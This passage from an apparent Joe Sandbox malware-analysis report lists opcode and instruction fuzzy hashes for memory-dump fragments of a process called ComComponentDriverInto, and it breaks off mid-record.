                                                            • Instruction ID: 9ec86c907de256ba70c86154cb74bea36a086307b22e482fa710bd1d7bc38876
                                                            • Opcode Fuzzy Hash: 0acdcf10d4879fe2170a0bde597c9ada0af49b8d00787437736c1976dd4630f2
                                                            • Instruction Fuzzy Hash: C5315912B0D55A1EE328B3BC74B9AF86BC1DF4933AF1445BBE44DCA1E7DE086841C294
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                            • Instruction ID: 9a76a4bb2ca4998e72b810c9e087cc460832d1f4d9696864cbea9ab0d5a55eb2
                                                            • Opcode Fuzzy Hash: 2970d6966922015f1e7144b44bcded8f54c60ce91cbff2c87ada44d8df070fd3
                                                            • Instruction Fuzzy Hash: 9121E43130DC184FE768EB4CE88A9B977D1EB9932171101BAE58EC7176E951EC8287C1
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f74f9168cd1b00fa37c6643fa17965e6b656ef7a61ba1ed647e9808205f9cb67
                                                            • Instruction ID: 55dfd32d44f4d427f24bb6c2af251a238818407d0d960edc5d6c5f020c6aec9d
                                                            • Opcode Fuzzy Hash: f74f9168cd1b00fa37c6643fa17965e6b656ef7a61ba1ed647e9808205f9cb67
                                                            • Instruction Fuzzy Hash: 7D213420B1891D0FE798B72C9469B7976C2EF99321F0100B9E40EC32F6CE54AC028291
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2f059eef96e1c3ed92649436855abaff897e1ae6944103f07031785520781b1
                                                            • Instruction ID: 91bd972b7c68c0cd6dda3ff05b002d119c155298459b09d835178a019470a436
                                                            • Opcode Fuzzy Hash: e2f059eef96e1c3ed92649436855abaff897e1ae6944103f07031785520781b1
                                                            • Instruction Fuzzy Hash: 87210736B0D25D4FE732ABA898510DC7B60EF82325F0546B3D05C8F1D3D968264AC7A5
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52235a417d81fe07695c8e83f7bf0aa083ef7cb39f8a58b095d145f5c79e55f8
                                                            • Instruction ID: b3b80aec283957e9fae04635cbd0e137002da8cca8ae602e854e0546974d9463
                                                            • Opcode Fuzzy Hash: 52235a417d81fe07695c8e83f7bf0aa083ef7cb39f8a58b095d145f5c79e55f8
                                                            • Instruction Fuzzy Hash: 0E11C636B0E78D8FE721DFA888611DC7FB1EF42711F0645B7D088DB1A2D574264987A4
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4919f659e9e9755eb29cbf4bb3a7bb58f4356f64c81d6fa416d690c3807412a9
                                                            • Instruction ID: 14a4b7918656457ed95fa39685e183649baa1b3ddcc0f5f2da0762d9cbbcee0a
                                                            • Opcode Fuzzy Hash: 4919f659e9e9755eb29cbf4bb3a7bb58f4356f64c81d6fa416d690c3807412a9
                                                            • Instruction Fuzzy Hash: 4B11C620F0D50E4BE7B4EB58D8666B872D2EF44700F5101BDE84DC32F2EE686A404695
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c5f8f4378544ac185960698d72a18b2a14614b80c2428a5f4821ce72388f6ca3
                                                            • Instruction ID: 5c0740c5f140d1512659d3f011e86ef622ce66f2004dc241c3a4bb7258549fc8
                                                            • Opcode Fuzzy Hash: c5f8f4378544ac185960698d72a18b2a14614b80c2428a5f4821ce72388f6ca3
                                                            • Instruction Fuzzy Hash: ED119C31A08A1D8FDB64DF44C454BA9B3A2EB64311F1541BAD44EE72A0CAB5AED5CF40
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c473bbba4ccecfa2a9d388d3b9021557773f97a09c310a988f3b762e6fa9058b
                                                            • Instruction ID: ebb97b2b2a35c82dcf8eea23c79aa98968cd2473da698bc02f9ff0859e3832ad
                                                            • Opcode Fuzzy Hash: c473bbba4ccecfa2a9d388d3b9021557773f97a09c310a988f3b762e6fa9058b
                                                            • Instruction Fuzzy Hash: 5011A136A0E38D8FE722DFA888A01DD7FB1EF42711F0645F7D088DB1A2D57466498764
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71f5de77be2670f597288237adeeb9157df1988227c3384db0536af02e4b6afe
                                                            • Instruction ID: b9b214a0c2509cd61329f446c7c1f3e820f2459f313fdd798b2ede30d06b83c7
                                                            • Opcode Fuzzy Hash: 71f5de77be2670f597288237adeeb9157df1988227c3384db0536af02e4b6afe
                                                            • Instruction Fuzzy Hash: 13019235A0E38D9FD721DFA4C89019CBFB1EF02710F1641E7D048DB1A2D5746645C754
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 686c2b0a866b0c144d5eaf08c3534a3be37dd168d070065e161fbc4cca82279f
                                                            • Instruction ID: 6769a9a40feb0f1509c5f6cd414370b56a8de65522aab028926debe777af5c1d
                                                            • Opcode Fuzzy Hash: 686c2b0a866b0c144d5eaf08c3534a3be37dd168d070065e161fbc4cca82279f
                                                            • Instruction Fuzzy Hash: 9501BC31A0E38D9FEB21DBA488A009CBFB1AF02700F1542E7D088CB2A2D9786A44C754
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ed99aa44a632927bf6e35c6446f32d213e0305bad0eba24e0d756e091ec0a55f
                                                            • Instruction ID: ffe5decdc269832d90e4e5e91cd51baf29360e1af7d4d018a4f91488d6de84a2
                                                            • Opcode Fuzzy Hash: ed99aa44a632927bf6e35c6446f32d213e0305bad0eba24e0d756e091ec0a55f
                                                            • Instruction Fuzzy Hash: D5013630A0941E4EEBB8EB94D8657F873A2FF54310F1101BDD84DD35B1DEB86A918A15
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 729d9c1892bb741b64810aa4cff6336e980ae3c6a7f2640dcfef33bcf3e2b684